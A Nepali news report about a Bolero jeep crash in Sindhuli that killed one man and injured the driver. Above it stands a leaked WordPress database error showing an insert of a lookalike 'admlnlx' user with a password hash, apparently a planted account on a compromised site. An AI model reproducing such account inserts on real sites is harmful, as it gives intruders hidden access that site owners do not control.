WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpxnZSh27FFcFIGBT/795CN3/QYHmN1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 00:05:07', '', 'admlnlx', 'admlnlx')
सिन्धुली । सिन्धुलीमा बोलेरो दुर्घटना हुँदा एक जनाको मृत्यु भएको छ भने एक जना घाइते भएका छन । मृत्यु हुनेमा महोत्तरीको रामगोपालपुर नगरपालिका–५ कञ्चनपुर निवासी ४१ वर्षीय वसन्त मुखिया रहेका जिल्ला प्रहरी कार्यालयका प्रहरी नायब उपरीक्षक श्यामबहादुर खत्रीले जानकारी दिए । उहाँका अनुसार मुखियाको उपचारका क्रममा मृत्यु भएको हो ।
सिन्धुली हुँदै खुर्कोटतर्फ जाँदै गरेको ज१च १३५४ नंको बलेरो आँफै अनियन्त्रित भई सडकबाट अन्दाजी २० मिटर तल खसेको थियो ।
बोलेरो चालक धनुषाका गोविन्दपुर–६ का अन्दाजी २२ वर्षीय सिजल यादव गम्भीर घाइते हुनुभएका छन् । उहाँको सिन्धुली अस्पताल उपचारपश्चात थप उपचारका लागि काठमाडौँ पठाइएको जिल्ला प्रहरी कार्यालयले जनाएको छ ।